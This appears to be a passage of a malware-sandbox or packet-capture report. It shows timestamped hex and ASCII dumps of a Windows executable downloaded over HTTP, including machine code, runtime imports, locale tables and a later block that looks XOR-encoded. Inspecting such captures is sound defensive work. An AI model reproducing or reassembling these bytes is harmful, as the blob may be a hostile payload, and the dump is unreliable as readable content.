                                                                                                                                  2022-10-17 20:07:17 UTC740INData Raw: 6a 01 ff 70 08 e8 7e 23 00 00 83 c4 18 85 c0 0f 85 39 ff ff ff e8 3a 73 ff ff c7 00 2a 00 00 00 33 c0 66 89 07 eb 41 39 b0 a8 00 00 00 75 11 8b 75 0c 8d 4e 01 8a 06 46 84 c0 75 f9 2b f1 eb 28 56 56 83 ce ff 56 ff 75 0c 6a 09 51 e8 37 23 00 00 83 c4 18 85 c0 75 0d e8 f7 72 ff ff c7 00 2a 00 00 00 eb 03 8d 70 ff 80 7d f0 00 74 0a 8b 4d e4 83 a1 50 03 00 00 fd 8b c6 5f 5e 5b c9 c3 8b ff 55 8b ec 83 ec 10 53 8b 5d 10 56 57 8b 7d 0c 33 f6 85 ff 75 3b 85 db 75 3b 85 ff 74 05 33 c0 66 89 07 8b 45 08 85 c0 74 02 89 30 ff 75 1c 8d 4d f0 e8 80 41 ff ff 8b c3 39 5d 18 77 03 8b 45 18 3d ff ff ff 7f 76 1e e8 87 72 ff ff 6a 16 eb 58 85 db 75 c5 e8 7a 72 ff ff 6a 16 5e 89 30 e8 66 53 ff ff eb 72 8d 4d f4 51 50 ff 75 14 57 e8 e8 fd ff ff 83 c4 10 83 f8 ff 75 12 85 ff 74
                                                                                                                                  Data Ascii: jp~#9:s*3fA9uuNFu+(VVVujQ7#ur*p}tMP_^[US]VW}3u;u;t3fEt0uMA9]wE=vrjXuzrj^0fSrMQPuWut
                                                                                                                                  2022-10-17 20:07:17 UTC748INData Raw: 00 00 8d a4 24 00 00 00 00 db bd 62 ff ff ff db ad 62 ff ff ff f6 85 69 ff ff ff 40 74 09 c6 85 70 ff ff ff 00 eb 07 c6 85 70 ff ff ff 00 de c1 c3 8d a4 24 00 00 00 00 90 db bd 62 ff ff ff db ad 62 ff ff ff f6 85 69 ff ff ff 40 74 20 d9 c9 db bd 62 ff ff ff db ad 62 ff ff ff f6 85 69 ff ff ff 40 74 09 c6 85 70 ff ff ff 00 eb 07 c6 85 70 ff ff ff 01 de c1 c3 90 dd d8 dd d8 db 2d b0 84 42 00 80 bd 70 ff ff ff 00 7f 07 c6 85 70 ff ff ff 01 0a c9 c3 8d 49 00 dd d8 dd d8 db 2d c4 84 42 00 0a ed 74 02 d9 e0 0a c9 74 08 dd 05 d6 84 42 00 de c9 c3 0a c9 74 02 d9 e0 c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 c4 e0 89 45 e0 8b 45 18 89 45 f0 8b 45 1c 89 45 f4 eb 09 55 8b ec 83 c4 e0 89 45 e0 dd 5d f8 89 4d e4 8b 45 10 8b 4d 14 89 45 e8 89 4d ec 8d 45 08 8d
                                                                                                                                  Data Ascii: $bbi@tpp$bbi@t bbi@tpp-BppI-BttBtUEEEEEUE]MEMEME
                                                                                                                                  2022-10-17 20:07:17 UTC756INData Raw: ff 59 89 75 fc 8b fe a1 f8 62 46 00 89 7d e0 39 45 08 7c 1f 39 34 bd f8 60 46 00 75 31 e8 ed fe ff ff 89 04 bd f8 60 46 00 85 c0 75 14 6a 0c 5e 89 75 e4 c7 45 fc fe ff ff ff e8 15 00 00 00 eb a2 a1 f8 62 46 00 83 c0 40 a3 f8 62 46 00 47 eb bb 8b 75 e4 6a 07 e8 64 16 ff ff 59 c3 8b ff 55 8b ec 8b 45 08 8b c8 83 e0 3f c1 f9 06 6b c0 38 03 04 8d f8 60 46 00 50 ff 15 08 40 42 00 5d c3 8b ff 55 8b ec 8b 45 08 8b c8 83 e0 3f c1 f9 06 6b c0 38 03 04 8d f8 60 46 00 50 ff 15 0c 40 42 00 5d c3 8b ff 55 8b ec 53 56 8b 75 08 57 85 f6 78 67 3b 35 f8 62 46 00 73 5f 8b c6 8b fe 83 e0 3f c1 ff 06 6b d8 38 8b 04 bd f8 60 46 00 f6 44 03 28 01 74 44 83 7c 03 18 ff 74 3d e8 c3 4f ff ff 83 f8 01 75 23 33 c0 2b f0 74 14 83 ee 01 74 0a 83 ee 01 75 13 50 6a f4 eb 08 50 6a f5 eb
                                                                                                                                  Data Ascii: YubF}9E|94`Fu1`Fuj^uEbF@bFGujdYUE?k8`FP@B]UE?k8`FP@B]USVuWxg;5bFs_?k8`FD(tD|t=Ou#3+ttuPjPj
                                                                                                                                  2022-10-17 20:07:17 UTC764INData Raw: 59 59 85 c0 75 1f 57 33 db 53 56 e8 63 02 00 00 83 c4 0c 85 c0 74 0e 81 0f 00 01 00 00 39 5f 04 75 03 89 77 04 8b 07 c1 e8 02 f7 d0 83 e0 01 eb 05 33 c0 89 07 40 8b 4d fc 5f 5e 33 cd 5b e8 3b 97 fe ff c9 c2 04 00 8b ff 55 8b ec 81 ec f4 00 00 00 a1 18 20 43 00 33 c5 89 45 fc 53 56 8b 75 08 57 e8 e8 5a ff ff 8b d8 e8 e1 5a ff ff 56 8b b8 4c 03 00 00 e8 a2 00 00 00 59 8b 4b 60 8b f0 f7 d9 8d 85 0c ff ff ff 6a 78 1b c9 81 e1 02 f0 ff ff 50 81 c1 01 10 00 00 51 56 ff 15 d0 40 42 00 85 c0 75 05 21 07 40 eb 61 8d 85 0c ff ff ff 50 ff 73 50 e8 be c6 ff ff 59 59 8b 4b 60 85 c0 75 09 85 c9 75 32 57 6a 01 eb 20 85 c9 75 32 39 4b 5c 74 2d 8d 85 0c ff ff ff 50 ff 73 50 e8 94 c6 ff ff 59 59 85 c0 75 18 57 50 56 e8 82 01 00 00 83 c4 0c 85 c0 74 09 83 0f 04 89 77 04 89
                                                                                                                                  Data Ascii: YYuW3SVct9_uw3@M_^3[;U C3ESVuWZZVLYK`jxPQV@Bu!@aPsPYYK`uu2Wj u29K\t-PsPYYuWPVtw
                                                                                                                                  2022-10-17 20:07:17 UTC772INData Raw: f6 ff ff 89 85 2c fe ff ff 8d 85 a0 f6 ff ff 50 8d 85 30 fe ff ff 56 50 e8 97 e3 fe ff 83 c4 10 32 c0 e9 22 ff ff ff 83 a5 9c f6 ff ff 00 83 a5 2c fe ff ff 00 6a 00 eb 0f 33 c0 50 89 85 2c fe ff ff 89 85 9c f6 ff ff 8d 85 a0 f6 ff ff 50 8d 85 30 fe ff ff 56 50 e8 58 e3 fe ff 83 c4 10 8b 8d 2c fe ff ff 8b bd 9c f8 ff ff 89 bd b8 f8 ff ff 85 c9 74 7a 83 a5 b4 f8 ff ff 00 33 ff 8b 84 bd 30 fe ff ff 6a 0a 5a f7 e2 03 85 b4 f8 ff ff 89 84 bd 30 fe ff ff 83 d2 00 47 89 95 b4 f8 ff ff 3b f9 75 d9 8b bd b8 f8 ff ff 85 d2 74 40 8b 85 2c fe ff ff 83 f8 73 73 0f 89 94 85 30 fe ff ff ff 85 2c fe ff ff eb 26 33 c0 50 89 85 9c f6 ff ff 89 85 2c fe ff ff 8d 85 a0 f6 ff ff 50 8d 85 30 fe ff ff 56 50 e8 c8 e2 fe ff 83 c4 10 8d 85 5c fc ff ff 50 8d 85 2c fe ff ff 50 e8 c7
                                                                                                                                  Data Ascii: ,P0VP2",j3P,P0VPX,tz30jZ0G;ut@,ss0,&3P,P0VP\P,P
                                                                                                                                  2022-10-17 20:07:17 UTC779INData Raw: 83 c2 14 89 54 24 08 89 54 24 04 89 14 24 e8 ba ed ff ff 83 c4 10 dd 44 24 04 c3 f3 0f 7e 44 24 04 66 0f f3 ca 66 0f 28 d8 66 0f c2 c1 06 3d ff 03 00 00 7c 25 3d 32 04 00 00 7f b0 66 0f 54 05 80 ec 42 00 f2 0f 58 c8 66 0f d6 4c 24 04 dd 44 24 04 c3 dd 05 c0 ec 42 00 c3 66 0f c2 1d a0 ec 42 00 06 66 0f 54 1d 80 ec 42 00 66 0f d6 5c 24 04 dd 44 24 04 c3 33 c0 50 50 6a 03 50 6a 03 68 00 00 00 40 68 c8 ec 42 00 ff 15 74 40 42 00 a3 60 2a 43 00 c3 8b 0d 60 2a 43 00 83 f9 fe 75 0b e8 d1 ff ff ff 8b 0d 60 2a 43 00 33 c0 83 f9 ff 0f 95 c0 c3 a1 60 2a 43 00 83 f8 ff 74 0c 83 f8 fe 74 07 50 ff 15 30 40 42 00 c3 8b ff 55 8b ec 56 6a 00 ff 75 10 ff 75 0c ff 75 08 ff 35 60 2a 43 00 ff 15 30 41 42 00 8b f0 85 f6 75 2d ff 15 80 40 42 00 83 f8 06 75 22 e8 b6 ff ff ff e8
                                                                                                                                  Data Ascii: T$T$$D$~D$ff(f=|%=2fTBXfL$D$BfBfTBf\$D$3PPjPjh@hBt@B`*C`*Cu`*C3`*CttP0@BUVjuuu5`*C0ABu-@Bu"
                                                                                                                                  2022-10-17 20:07:17 UTC787INData Raw: 00 01 00 00 00 28 00 00 00 06 00 00 00 16 00 00 00 7b 00 00 00 02 00 00 00 57 00 00 00 16 00 00 00 21 00 00 00 27 00 00 00 d4 00 00 00 27 00 00 00 83 00 00 00 16 00 00 00 e6 03 00 00 0d 00 00 00 08 00 00 00 0c 00 00 00 15 00 00 00 0b 00 00 00 11 00 00 00 12 00 00 00 32 00 00 00 81 00 00 00 6e 00 00 00 05 00 00 00 61 09 00 00 10 00 00 00 e3 03 00 00 69 00 00 00 0e 00 00 00 0c 00 00 00 03 00 00 00 02 00 00 00 1e 00 00 00 05 00 00 00 29 11 00 00 16 00 00 00 d5 04 00 00 0b 00 00 00 19 00 00 00 05 00 00 00 20 00 00 00 0d 00 00 00 04 00 00 00 18 00 00 00 1d 00 00 00 05 00 00 00 13 00 00 00 0d 00 00 00 1d 27 00 00 0d 00 00 00 40 27 00 00 64 00 00 00 41 27 00 00 65 00 00 00 3f 27 00 00 66 00 00 00 35 27 00 00 67 00 00 00 19 27 00 00 09 00 00 00 45 27 00 00 6a 00
                                                                                                                                  Data Ascii: ({W!''2nai) '@'dA'e?'f5'g'E'j
                                                                                                                                  2022-10-17 20:07:17 UTC795INData Raw: 97 98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 7f 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95
                                                                                                                                  Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
                                                                                                                                  2022-10-17 20:07:17 UTC803INData Raw: 00 03 00 00 00 10 00 00 00 47 65 74 55 73 65 72 44 65 66 61 75 6c 74 4c 6f 63 61 6c 65 4e 61 6d 65 00 00 00 00 07 00 00 00 10 00 00 00 03 00 00 00 10 00 00 00 49 73 56 61 6c 69 64 4c 6f 63 61 6c 65 4e 61 6d 65 00 00 00 03 00 00 00 10 00 00 00 4c 43 4d 61 70 53 74 72 69 6e 67 45 78 00 00 00 04 00 00 00 10 00 00 00 4c 43 49 44 54 6f 4c 6f 63 61 6c 65 4e 61 6d 65 00 00 00 00 03 00 00 00 10 00 00 00 4c 6f 63 61 6c 65 4e 61 6d 65 54 6f 4c 43 49 44 00 00 00 00 12 00 00 00 41 70 70 50 6f 6c 69 63 79 47 65 74 50 72 6f 63 65 73 73 54 65 72 6d 69 6e 61 74 69 6f 6e 4d 65 74 68 6f 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 43 00 00 00 00 00 00 38 43 ff ff ff ff ff ff 0f 00 ff ff ff ff ff ff 0f 00 00 00 00 00 00 00 f0 3f 00 00 00 00 00 00 f0 3f ff ff ff ff ff ff
                                                                                                                                  Data Ascii: GetUserDefaultLocaleNameIsValidLocaleNameLCMapStringExLCIDToLocaleNameLocaleNameToLCIDAppPolicyGetProcessTerminationMethod8C8C??
                                                                                                                                  2022-10-17 20:07:17 UTC811INData Raw: 00 2d 00 4d 00 4f 00 00 00 64 00 65 00 2d 00 4c 00 49 00 00 00 65 00 6e 00 2d 00 4e 00 5a 00 00 00 65 00 73 00 2d 00 43 00 52 00 00 00 66 00 72 00 2d 00 4c 00 55 00 00 00 62 00 73 00 2d 00 42 00 41 00 2d 00 4c 00 61 00 74 00 6e 00 00 00 00 00 73 00 6d 00 6a 00 2d 00 53 00 45 00 00 00 00 00 61 00 72 00 2d 00 4d 00 41 00 00 00 65 00 6e 00 2d 00 49 00 45 00 00 00 65 00 73 00 2d 00 50 00 41 00 00 00 66 00 72 00 2d 00 4d 00 43 00 00 00 73 00 72 00 2d 00 42 00 41 00 2d 00 4c 00 61 00 74 00 6e 00 00 00 00 00 73 00 6d 00 61 00 2d 00 4e 00 4f 00 00 00 00 00 61 00 72 00 2d 00 54 00 4e 00 00 00 65 00 6e 00 2d 00 5a 00 41 00 00 00 65 00 73 00 2d 00 44 00 4f 00 00 00 73 00 72 00 2d 00 42 00 41 00 2d 00 43 00 79 00 72 00 6c 00 00 00 00 00 73 00 6d 00 61 00 2d 00 53 00
                                                                                                                                  Data Ascii: -MOde-LIen-NZes-CRfr-LUbs-BA-Latnsmj-SEar-MAen-IEes-PAfr-MCsr-BA-Latnsma-NOar-TNen-ZAes-DOsr-BA-Cyrlsma-S
                                                                                                                                  2022-10-17 20:07:17 UTC818INData Raw: 3f 00 00 00 00 40 d9 ef 3f 00 00 00 00 40 d8 ef 3f 00 00 00 00 40 d7 ef 3f 00 00 00 00 40 d6 ef 3f 00 00 00 00 40 d5 ef 3f 00 00 00 00 40 d4 ef 3f 00 00 00 00 40 d3 ef 3f 00 00 00 00 80 d2 ef 3f 00 00 00 00 80 d1 ef 3f 00 00 00 00 80 d0 ef 3f 00 00 00 00 80 cf ef 3f 00 00 00 00 80 ce ef 3f 00 00 00 00 80 cd ef 3f 00 00 00 00 80 cc ef 3f 00 00 00 00 80 cb ef 3f 00 00 00 00 80 ca ef 3f 00 00 00 00 80 c9 ef 3f 00 00 00 00 80 c8 ef 3f 00 00 00 00 80 c7 ef 3f 00 00 00 00 80 c6 ef 3f 00 00 00 00 80 c5 ef 3f 00 00 00 00 80 c4 ef 3f 00 00 00 00 80 c3 ef 3f 00 00 00 00 80 c2 ef 3f 00 00 00 00 80 c1 ef 3f 00 00 00 00 00 10 f0 3f 00 00 00 00 c0 0f f0 3f 00 00 00 00 80 0f f0 3f 00 00 00 00 40 0f f0 3f 00 00 00 00 00 0f f0 3f 00 00 00 00 c0 0e f0 3f 00 00 00 00 80 0e
                                                                                                                                  Data Ascii: ?@?@?@?@?@?@?@??????????????????????@???
                                                                                                                                  2022-10-17 20:07:17 UTC826INData Raw: bf 71 d1 12 f9 df d1 33 bd 00 00 00 92 ec 3f 05 bf 3a 1a 91 52 ae a5 24 bd 00 00 00 40 ed df 04 bf dc 8e 9f 24 0f 05 3d bd 00 00 00 ec ed 7f 04 bf 0e 4b 92 dd 02 d1 27 bd 00 00 00 5c ee 3f 04 bf 81 d0 aa 7b 95 62 3e bd 00 00 00 02 ef df 03 bf a0 f2 24 45 ad 76 43 bd 00 00 00 a6 ef 7f 03 bf 49 e9 77 38 91 52 27 bd 00 00 00 46 f0 1f 03 bf 47 f8 5f 6a b2 2c 29 bd 00 00 00 e2 f0 bf 02 bf ae 2b 6a ec 42 da 44 bd 00 00 00 7c f1 5f 02 bf 0b 60 6b 05 e4 81 41 bd 00 00 00 12 f2 ff 01 bf 25 27 72 a7 0c 42 4c bd 00 00 00 a6 f2 9f 01 bf 09 bc 54 94 b9 1a 45 bd 00 00 00 06 f3 5f 01 bf 11 12 c6 fa 02 47 4f bd 00 00 00 96 f3 ff 00 bf e3 23 1e 69 bf cc 23 bd 00 00 00 20 f4 9f 00 bf 3b 8a de 5e d8 b7 48 bd 00 00 00 a8 f4 3f 00 bf 36 28 60 4a f9 94 4a bd 00 00 00 5c ea bf
                                                                                                                                  Data Ascii: q3?:R$@$=K'\?{b>$EvCIw8R'FG_j,)+jBD|_`kA%'rBLTE_GO#i# ;^H?6(`JJ\
                                                                                                                                  2022-10-17 20:07:17 UTC834INData Raw: 00 80 fe 42 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 20 ff 42 00 f8 52 46 00 04 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 a8 ff 42 00 70 01 43 00 74 ff 42 00 cc fe 42 00 80 fe 42 00 00 00 00 00 00 00 00 00 01 00 00 00 03 00 00 00 f0 01 43 00 00 00 00 00 01 00 00 00 04 00 00 00 24 02 43 00 94 53 46 00 02 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 04 ff 42 00 00 00 00 00 00 00 00 00 02 00 00 00 14 ff 42 00 00 00 00 00 00 00 00 00 01 00 00 00 50 ff 42 00 00 00 00 00 00 00 00 00 00 00 00 00 3c 53 46 00 c0 00 43 00 00 00 00 00 00 00 00 00 00 00 00 00 78 53 46 00 4c 00 43 00 04 56 46 00 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 44 fe 42 00 00 00 00 00 00 00 00 00 03 00 00 00 80 fd 42 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii: B BRF@BpCtBBBC$CSF@BBPB<SFCxSFLCVF@DBB
                                                                                                                                  2022-10-17 20:07:17 UTC842INData Raw: 64 46 69 72 73 74 46 69 6c 65 45 78 57 00 00 8f 01 46 69 6e 64 4e 65 78 74 46 69 6c 65 57 00 8f 03 49 73 56 61 6c 69 64 43 6f 64 65 50 61 67 65 00 b5 01 47 65 74 41 43 50 00 00 9a 02 47 65 74 4f 45 4d 43 50 00 00 3a 02 47 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 74 72 69 6e 67 73 57 00 00 ad 01 46 72 65 65 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 74 72 69 6e 67 73 57 00 16 05 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 56 61 72 69 61 62 6c 65 57 00 b7 02 47 65 74 50 72 6f 63 65 73 73 48 65 61 70 00 00 4e 05 53 65 74 53 74 64 48 61 6e 64 6c 65 00 00 51 03 48 65 61 70 53 69 7a 65 00 00 ce 00 43 72 65 61 74 65 46 69 6c 65 57 00 15 06 57 72 69 74 65 43 6f 6e 73 6f 6c 65 57 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 01 00
                                                                                                                                  Data Ascii: dFirstFileExWFindNextFileWIsValidCodePageGetACPGetOEMCP:GetEnvironmentStringsWFreeEnvironmentStringsWSetEnvironmentVariableWGetProcessHeapNSetStdHandleQHeapSizeCreateFileWWriteConsoleW
                                                                                                                                  2022-10-17 20:07:17 UTC850INData Raw: 05 db 30 5d 07 84 70 5d 77 a6 1c 5a 71 a5 5f 1c 77 ac 3a 55 18 97 30 5d 7d 81 8c 83 63 a4 45 40 77 ac 31 4e 73 bd 34 71 70 bd 34 32 4d ac 30 57 ab 72 33 7b a9 ac 36 77 77 ad 2c 5d 77 ae 30 69 77 e4 4c 5d 63 ac 30 5d 77 ac 30 5b 77 20 a2 5d 74 bd 30 5d 76 b7 00 58 77 fd 31 5d 77 a7 30 5d 66 df e0 5d 77 aa 3a 5f 18 f0 30 5d 7d c3 6e 5d 77 a6 3b 65 c3 ac 30 5d 70 c3 6f 5d 77 a6 44 43 77 ac 31 51 7f c3 50 5d 77 a6 42 52 76 ac 40 75 16 ac 30 57 5b a0 36 55 18 ce 30 5d 7d c3 fb 5d 77 aa 38 32 17 ac 30 57 05 b5 31 5d 07 84 51 5d 77 a6 1c 41 71 aa 5f 97 77 ac 36 2f 54 ad 30 2d 7f c3 52 5d 77 a6 18 3e 77 ac 3a 32 bc ac 30 5b 7f c3 50 5d 77 a6 42 7a 76 ac 40 75 16 ac 30 57 5b a0 36 55 18 ce 30 5d 7d c3 fd 5d 77 aa 38 32 17 ac 30 57 05 9d 31 5d 07 84 51 5d 77 a6 1c
                                                                                                                                  Data Ascii: 0]p]wZq_w:U0]}cE@w1Ns4qp42M0Wr3{6ww,]w0iwL]c0]w0[w ]t0]vXw1]w0]f]w:_0]}n]w;e0]po]wDCw1QP]wBRv@u0W[6U0]}]w820W1]Q]wAq_w6/T0-R]w>w:20[P]wBzv@u0W[6U0]}]w820W1]Q]w
                                                                                                                                  2022-10-17 20:07:17 UTC857INData Raw: 07 c3 d0 5d 77 aa 15 4b 18 4e 30 5d 71 c3 f2 5d 77 a6 22 59 5f 95 30 5d 7d 96 64 a2 88 53 ee 53 65 a8 ce 4b 71 ac 30 46 18 96 30 5d 7d 70 ee 5e 51 72 30 83 74 8a ee 5d 71 86 30 5d 77 ed 7c 5d 77 ae 30 5d 77 5c 30 5d 77 1f 30 5d 77 0f 31 5d 77 a2 30 5d 77 ac 30 5d 77 ac 30 5d 77 44 30 5d 77 67 30 5d 77 1f 31 5d 77 af 30 5d 77 bd 30 5d 76 ac 30 5d 77 aa 30 5d 77 1e 31 5d 77 14 31 5d 77 af 30 5d 77 bd 30 5d 76 b2 32 75 9f ac 30 5b 5d bf 00 5b 77 f1 30 5d 77 ac 30 5d 77 ae 33 78 5a aa 16 2e c3 ac 30 57 04 6f 30 5d 7d d1 36 5d 77 a8 32 59 6f 21 6a 5d 77 ad 15 4b 05 79 33 5d 07 0e 15 4a 5f 68 30 5d 7d 0e 27 32 38 ac 30 57 09 bb 31 5d 73 89 1d 4a 51 d2 26 5c 77 a8 ce 5b fd ad 30 5b 04 69 30 5d 7d 89 b0 4a 76 ac 34 75 7a ac 30 76 0a ab 30 5d 73 86 2e 5e 18 77 30
                                                                                                                                  Data Ascii: ]wKN0]q]w"Y_0]}dSSeKq0F0]}p^Qr0t]q0]w|]w0]w\0]w0]w1]w0]w0]w0]wD0]wg0]w1]w0]w0]v0]w0]w1]w1]w0]w0]v2u0[][w0]w0]w3xZ.0Wo0]}6]w2Yo!j]wKy3]J_h0]}'280W1]sJQ&\w[0[i0]}Jv4uz0v0]s.^w0
                                                                                                                                  2022-10-17 20:07:17 UTC865INData Raw: 7b 23 07 5d 77 ae 4b da 77 ac 34 75 14 ac 30 5b 5b bb 21 57 66 a0 bf 6a 77 ac 32 26 f0 ac 30 59 68 a1 5a 04 6f c6 6b 76 59 bd 3a 4c 7b 23 07 5d 77 ae 4b da 77 ac 34 42 7b c6 69 45 1d f7 1b 4a 75 d7 3a 5d 77 a8 21 57 66 a0 bf 6a 77 ac 32 26 f0 ac 30 59 a3 3d 5e 20 f1 ac 30 59 66 a7 21 55 66 a1 69 37 2f bb 5a 05 64 a7 21 51 60 f4 23 51 66 a7 21 54 48 9f cf a2 88 bd 3a 64 65 ae 30 5d 75 d7 20 5d 77 a8 37 55 2f 23 09 5d 77 ae 21 57 f9 c5 bd 07 77 ac 31 20 fc ac 30 59 61 bf 3e 4b 64 a3 08 83 76 ac 30 4c 7d bd 3f d2 40 ac 30 5f 0c 2b 30 5d 73 b3 39 37 49 d8 31 5d 77 bd 3a 4c 78 23 07 5d 77 ae 4b da 77 ac 34 75 14 ac 30 5b 4d a8 31 5d 77 ae 4b 56 77 ac 34 4a 1d 9f 6b 5f 0c bc 30 5d 73 ab 38 05 f8 95 30 5d 75 d7 bb 5d 77 a8 21 52 68 a0 bd 06 77 ac 31 78 a7 4b 30
                                                                                                                                  Data Ascii: {#]wKw4u0[[!Wfjw2&0YhZokvY:L{#]wKw4B{iEJu:]w!Wfjw2&0Y=^ 0Yf!Ufi7/Zd!Q`#Qf!TH:de0]u ]w7U/#]w!Ww1 0Ya>Kdv0L}?@0_+0]s97I1]w:Lx#]wKw4u0[M1]wKVw4Jk_0]s80]u]w!Rhw1xK0
                                                                                                                                  2022-10-17 20:07:17 UTC873INData Raw: 70 bd 39 32 4d ac 30 57 ab 72 33 7b a9 ac 38 4a 2f a0 38 5a f9 c5 0f 59 88 53 cf 83 74 8a ee 5d 71 86 30 5d 77 ed 3c 5c 77 ac 30 5d 77 0f 30 5d 77 fa 30 5d 77 55 30 5d 77 af 30 5d 77 bd 30 5d 76 ae 30 5d 77 34 30 5d 77 c3 30 5d 77 ab 31 5d 77 a0 30 5d 77 ac 30 5d 77 ae 30 5d 77 23 30 5d 77 2a 30 5d 77 b9 31 5d 77 a0 30 5d 77 ac 30 5d 77 ae 30 5d 77 2a 30 5d 77 31 30 5d 77 8f 31 5d 77 a0 30 5d 77 ac 30 5d 77 ac 30 5d 77 e7 30 5d 77 4a 30 5d 77 9d 31 5d 77 af 30 5d 77 bd 30 5d 76 ac 30 5d 77 4c 31 5d 77 fa 30 5d 77 9a 32 5d 77 af 30 5d 77 bd 30 5d 76 ae 30 5d 77 79 31 5d 77 c3 30 5d 77 e8 32 5d 77 a0 30 5d 77 ac 30 5d 77 ae 30 5d 77 60 31 5d 77 2a 30 5d 77 fe 32 5d 77 a0 30 5d 77 ac 30 5d 77 ae 30 5d 77 6f 31 5d 77 31 30 5d 77 cc 32 5d 77 a0 30 5d 77 ac 30
                                                                                                                                  Data Ascii: p92M0Wr3{8J/8ZYSt]q0]w<\w0]w0]w0]wU0]w0]w0]v0]w40]w0]w1]w0]w0]w0]w#0]w*0]w1]w0]w0]w0]w*0]w10]w1]w0]w0]w0]w0]wJ0]w1]w0]w0]v0]wL1]w0]w2]w0]w0]v0]wy1]w0]w2]w0]w0]w0]w`1]w*0]w2]w0]w0]w0]wo1]w10]w2]w0]w0
                                                                                                                                  2022-10-17 20:07:17 UTC881INData Raw: 77 e9 30 d8 77 dc 31 54 76 bc 30 8c 6b ac 30 10 76 2a 30 2e 76 a5 31 4d 77 b5 2a 5d 77 e1 31 d5 77 df 31 54 76 bc 30 40 6d ac 30 10 76 27 30 2e 76 2d 31 4d 77 09 1a 97 5d e9 30 d1 77 df 31 5d 76 ac 30 f6 63 ac 30 18 77 20 30 28 76 af 31 4d 77 18 32 5d 77 e9 30 b2 77 d9 31 5e 56 bc 30 c9 6b ac 30 18 77 5c 30 21 76 af 11 4d 77 38 2c 5d 77 e9 30 a5 77 29 31 de 76 bc 30 e5 74 ac 30 18 77 56 30 d5 76 2f 31 4d 77 14 33 5d 77 e9 30 a0 77 24 31 5e 56 bc 30 c9 6b ac 30 18 77 ba 31 d5 76 af 31 4d 77 c8 33 5d 77 e9 30 44 76 20 31 de 76 bc 30 45 76 ac 30 18 77 b6 31 d2 76 af 11 4d 77 38 2c 5d 77 e9 30 46 76 23 31 5e 76 bc 30 e9 75 ac 30 18 77 b1 31 cf 76 af 11 4d 77 38 2c 5d 77 e9 30 43 76 38 31 5e 76 ac 30 f0 72 ac 30 90 77 8d 31 c5 76 af 31 5d 77 1d 38 5d 77 61 30
                                                                                                                                  Data Ascii: w0w1Tv0k0v*0.v1Mw*]w1w1Tv0@m0v'0.v-1Mw]0w1]v0c0w 0(v1Mw2]w0w1^V0k0w\0!vMw8,]w0w)1v0t0wV0v/1Mw3]w0w$1^V0k0w1v1Mw3]w0Dv 1v0Ev0w1vMw8,]w0Fv#1^v0u0w1vMw8,]w0Cv81^v0r0w1v1]w8]wa0
                                                                                                                                  2022-10-17 20:07:17 UTC889INData Raw: 73 0b 28 03 76 5b 91 5d 77 ac 30 cc 6f 49 00 4b 62 f2 31 5e d5 ac 30 5d 77 2a 28 82 47 ad 30 03 76 a7 92 5d 77 ac 30 de 77 3f 32 ec 6f f2 31 4e d5 ac 30 5d 77 2f 30 09 7f 1a 28 02 76 b2 92 5d 77 ac 30 de 77 60 3c eb 6f cc 31 74 d5 ac 30 5d 77 2f 30 6c 67 1a 28 3c 76 98 92 5d 77 ac 30 de 77 2b 23 9c 6f ce 31 62 d5 ac 30 5d 77 2f 30 32 77 60 28 3e 76 e6 92 5d 77 ac 30 de 77 9c 36 8a 6f c8 31 08 d5 ac 30 5d 77 3d 28 b8 47 ba 25 38 76 cd 92 5d 77 ac 30 db 6f 73 00 5c 77 c9 31 34 d5 ac 30 5d 77 2f 30 ce 75 1d 28 38 76 dd 92 5d 77 ac 30 cc 6f 49 00 4b 62 ca 31 20 d5 ac 30 5d 77 2a 28 82 47 ad 30 3b 76 29 92 5d 77 ac 30 de 77 8f 33 bf 6f ca 31 ef d5 ac 30 5d 77 2f 30 65 74 1d 28 3a 76 16 92 5d 77 ac 30 db 6f 73 00 5c 77 c4 31 9f d5 ac 30 5d 77 2f 30 f6 74 41 28
                                                                                                                                  Data Ascii: s(v[]w0oIKb1^0]w*(G0v]w0w?2o1N0]w/0(v]w0w`<o1t0]w/0lg(<v]w0w+#o1b0]w/02w`(>v]w0w6o10]w=(G%8v]w0os\w140]w/0u(8v]w0oIKb1 0]w*(G0;v)]w0w3o10]w/0et(:v]w0os\w10]w/0tA(
